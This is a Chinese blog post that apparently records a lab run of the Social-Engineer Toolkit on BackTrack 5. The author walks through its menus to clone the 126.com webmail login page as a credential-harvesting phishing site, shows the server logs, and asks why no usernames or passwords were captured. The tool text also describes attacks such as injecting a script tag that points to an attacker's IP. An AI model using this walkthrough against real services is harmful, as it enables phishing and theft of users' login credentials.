环境:BT5,XP或者Win7,IE6、IE8、谷歌浏览器

操作如下:

root@bt:/pentest/exploits/set# ./set0101100101101111011101010010000001110010011001010110000101101100011011000111100100100000011010000110000101110110011001010010000001110100011011110010000001101101011101010110001101101000001000000111010001101001011011010110010100100000011011110110111000100000011110010110111101110101011100100010000001101000011000010110111001100100011100110010000000111010001011010010100100100000010101000110100001100001011011100110101101110011001000000110011001101111011100100010000001110101011100110110100101101110011001110010000001110100011010000110010100100000010100110110111101100011011010010110000101101100001011010100010101101110011001110110100101101110011001010110010101110010001000000101010001101111011011110110110001101011011010010111010000100000001010100110100001110101011001110111001100101010[---]        The Social-Engineer Toolkit (SET)         [---]        [---]        Created by: David Kennedy (ReL1K)         [---][---]        Development Team: JR DePre (pr1me)        [---][---]        Development Team: Joey Furr (j0fer)       [---][---]        Development Team: Thomas Werth            [---][---]        Development Team: Garland                 [---][---]                  Version: 3.6                    [---][---]          Codename: 'MMMMhhhhmmmmmmmmm'           [---][---]        Report bugs: davek@trustedsec.com         [---][---]         Follow me on Twitter: dave_rel1k         [---][---]       Homepage: https://www.trustedsec.com       [---]Welcome to the Social-Engineer Toolkit (SET). Your onestop shop for all of your social-engineering needs..Join us on irc.freenode.net in channel #setoolkitThe Social-Engineer Toolkit is a product of TrustedSec.Visit: https://www.trustedsec.comSelect from the menu:1) Social-Engineering Attacks2) Fast-Track Penetration Testing3) Third Party Modules4) Update the Metasploit Framework5) Update the Social-Engineer Toolkit6) Update SET configuration7) Help, Credits, and About99) Exit the Social-Engineer Toolkitset> 1.M"""bgd `7MM"""YMM MMP""MM""YMM ,MI    "Y   MM    `7 P'   MM   `7 `MMb.       MM   d        MM      `YMMNq.   MMmmMM        MM      .     `MM   MM   Y  ,     MM      Mb     dM   MM     ,M     MM      P"Ybmmd"  .JMMmmmmMMM   .JMML.[---]        The Social-Engineer Toolkit (SET)         [---]        [---]        Created by: David Kennedy (ReL1K)         [---][---]        Development Team: JR DePre (pr1me)        [---][---]        Development Team: Joey Furr (j0fer)       [---][---]        Development Team: Thomas Werth            [---][---]        Development Team: Garland                 [---][---]                  Version: 3.6                    [---][---]          Codename: 'MMMMhhhhmmmmmmmmm'           [---][---]        Report bugs: davek@trustedsec.com         [---][---]         Follow me on Twitter: dave_rel1k         [---][---]       Homepage: https://www.trustedsec.com       [---]Welcome to the Social-Engineer Toolkit (SET). Your onestop shop for all of your social-engineering needs..Join us on irc.freenode.net in channel #setoolkitThe Social-Engineer Toolkit is a product of TrustedSec.Visit: https://www.trustedsec.comSelect from the menu:1) Spear-Phishing Attack Vectors2) Website Attack Vectors3) Infectious Media Generator4) Create a Payload and Listener5) Mass Mailer Attack6) Arduino-Based Attack Vector7) SMS Spoofing Attack Vector8) Wireless Access Point Attack Vector9) QRCode Generator Attack Vector10) Powershell Attack Vectors11) Third Party Modules99) Return back to the main menu.set> 2The Web Attack module is  a unique way of utilizing multiple web-based attacksin order to compromise the intended victim.The Java Applet Attack method will spoof a Java Certificate and deliver a metasploit based payload. Uses a customized java applet created by ThomasWerth to deliver the payload.The Metasploit Browser Exploit method will utilize select Metasploitbrowser exploits through an iframe and deliver a Metasploit payload.The Credential Harvester method will utilize web cloning of a web-site that has a username and password field and harvest all the information posted to the website.The TabNabbing method will wait for a user to move to a differenttab, then refresh the page to something different.The Man Left in the Middle Attack method was introduced by Kos and utilizes HTTP REFERER's in order to intercept fields and harvest data from them. You need to have an already vulnerable site and in-corporate <script src="http://YOURIP/">. This could either be from acompromised site or through XSS.The Web-Jacking Attack method was introduced by white_sheep, Emgent and the Back|Track team. This method utilizes iframe replacements to make the highlighted URL link to appear legitimate however when clicked a window pops up then is replaced with the malicious link. You can editthe link replacement settings in the set_config if its too slow/fast.The Multi-Attack method will add a combination of attacks through the web attackmenu. For example you can utilize the Java Applet, Metasploit Browser,Credential Harvester/Tabnabbing, and the Man Left in the Middle attackall at once to see which is successful.1) Java Applet Attack Method2) Metasploit Browser Exploit Method3) Credential Harvester Attack Method4) Tabnabbing Attack Method5) Man Left in the Middle Attack Method6) Web Jacking Attack Method7) Multi-Attack Web Method8) Victim Web Profiler9) Create or import a CodeSigning Certificate99) Return to Main Menuset:webattack>3The first method will allow SET to import a list of pre-defined web applications that it can utilize within the attack.The second method will completely clone a website of your choosingand allow you to utilize the attack vectors within the completelysame web application you were attempting to clone.The third method allows you to import your own website, note that youshould only have an index.html when using the import websitefunctionality.1) Web Templates2) Site Cloner3) Custom Import99) Return to Webattack Menuset:webattack>2
[-] Credential harvester will allow you to utilize the clone capabilities within SET
[-] to harvest credentials or parameters from a website as well as place them into a report
[-] This option is used for what IP the server will POST to.
[-] If you're using an external IP, use your external IP for this
set:webattack> IP address for the POST back in Harvester/Tabnabbing:192.168.1.11
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone:email.126.com[*] Cloning the website: http://email.126.com
[*] This could take a little bit...The best way to use this attack is if username and password form
fields are available. Regardless, this captures all POSTs on a website.
[!] I have read the above message.Press <return> to continue[*] Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:
192.168.1.123 - - [28/Apr/2013 04:39:32] "GET / HTTP/1.1" 200 -
192.168.1.123 - - [28/Apr/2013 04:40:09] "GET / HTTP/1.1" 200 -
192.168.1.123 - - [28/Apr/2013 04:41:11] "GET / HTTP/1.1" 200 -

没有得到想要的用户名和密码。

克隆的网站如图:

在http://www.backtrack-linux.org/forums/showthread.php?t=29188上面,有人碰到了同样的问题。

成功画面应该是下面这样的:

我为什么拿不到用户名和密码?

后来,直接在BT5上用狐火浏览器做测试,是成功的,如图:

我初步怀疑是网络问题。

metasploit的SET的Credential Harvester Attack Method相关推荐

  1. hacker attack method

    hacker attack method 主动攻击获取 DDOS 信息炸弹 网络监听 恶意扫描 XSS跨站脚本 SQL注入 邮件攻击 被动获取 pishing 钓鱼网站 MITM WWW欺骗 缩写 M ...

  2. setoolkit的钓鱼攻击

    试验设备 Linux kali 5.9.0版本 在kail中setoolkit自带,无需下载,运行时需要赋予root权限 打开我们所需要的工具 setoolkit //打开工具 会跳出很多选项 Soc ...

  3. 渗透测试--3.1.社会工程学攻击

    目录 社会工程学攻击 SET介绍 一.建立克隆钓鱼网站收集目标凭证 二.set工具集之木马欺骗实战反弹链接 三.后渗透阶段 1.查看主机系统信息 2.到处用户密码的hash值 3.获得shell控制台 ...

  4. 【安全系列】setoolkit钓鱼

    setoolkit是一个为社会工程设计的开源渗透测试框架.SET具有许多自定义攻击向量,可让您快速进行可信的攻击. setoolkit 目录结构 modules readme README.md re ...

  5. 《Metasploit渗透测试魔鬼训练营》学习笔记

    Metasploit渗透测试魔鬼训练营学习笔记 法律常识 <中华人民共和国网络安全法>已由中华人民共和国第十二届全国人民代表大会常务委员会第二十四次会议于2016年11月7日通过,现予公布 ...

  6. MetaSploit攻击实例讲解------社会工程学set攻击(kali linux 2016.2(rolling))(详细)

    来源:https://www.cnblogs.com/zlslch/p/6888540.html 不多说,直接上干货! 首先,如果你是用的BT5,则set的配置文件是在 /pentest/exploi ...

  7. Metasploit魔鬼训练营笔记

    提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 前言 一.什么是渗透测试 二.初识Metasploit 1.针对Metasploitable2上samba服务漏洞的小实验 ...

  8. XSS实战攻击思路总结

    前言 前几天看到B站up主公孙田浩投稿的视频「QQ被盗后发布赌博广告,我一气之下黑了他们网站」,看完后不禁感叹为啥自己没有那么好的运气......实际上这就是一个中规中矩的XSS漏洞案例,在安全圈子里 ...

  9. Kali Linux Web 渗透测试秘籍 第九章 客户端攻击和社会工程

    第九章 客户端攻击和社会工程 作者:Gilberto Najera-Gutierrez 译者:飞龙 协议:CC BY-NC-SA 4.0 简介 我们目前所见的大部分技巧都尝试利用服务端的漏洞或设计缺陷 ...

  10. backtrack5渗透 笔记

    目录         1.信息收集         2.扫描工具         3.漏洞发现         4.社会工程学工具         5.运用层攻击msf         6.局域网攻击 ...

最新文章

  1. Spring MVC-07循序渐进之验证器 下 (JSR 303验证)
  2. 磁盘配额 挂载 和yum源的配置
  3. 手机上图片信息怎么拉一个矩形框_华为手机EMUI系统隐藏的10个功能,上手体验后,实用性无敌了...
  4. mysql limitorderby
  5. SCM系统(Supply Chain Management System,供应链管理系统)
  6. linux自动分区shell,SHELL脚本实现分区
  7. linux线程组和进程区别,Linux中进程和线程之间的区别
  8. ACR122密钥X字典
  9. blockquote缩进标签
  10. Javascript MS题蓄力:
  11. MFC添加afx_msg点击事件
  12. flink类加载器原理与隔离(flink jar包冲突)
  13. 【Python】pyqt5-----QLabel
  14. 吾爱神器,图片变清晰,这个软件好用的有点过分!
  15. 2022.03.23绝世武功
  16. 如何用计算机管理员权限,计算机管理员权限如何获得【图解】
  17. JavaScript获取B站分集视频标题及各集时长、累计时长
  18. 【OpenAirInterface】分立部署核心网与容器化ueransim仿真基站
  19. HDU 5224(最小周长)
  20. 2022 OpenCV人工智能竞赛优秀项目团队介绍集锦(一)

热门文章

  1. 荣耀畅玩7c能用鸿蒙吗,荣耀畅玩7C评测:人脸识别双摄 超高性价比
  2. matlab 进行时域分析实验报告,控制系统时域分析实验报告.doc
  3. JS Base64加密解密
  4. 迪赛智慧数——折线图(渐变堆叠图):国内智能快递柜营收规模及增长率
  5. 数据结构——邻接表Adjacency List
  6. 从iOS切换到Android(flyme)
  7. 字体图标和变形 transform属性的使用
  8. Codeforces Round #714 (Div. 2) B. AND Sequences (思维)
  9. 云原生的进一步具象化
  10. Java中级内容——异常处理(exception handing)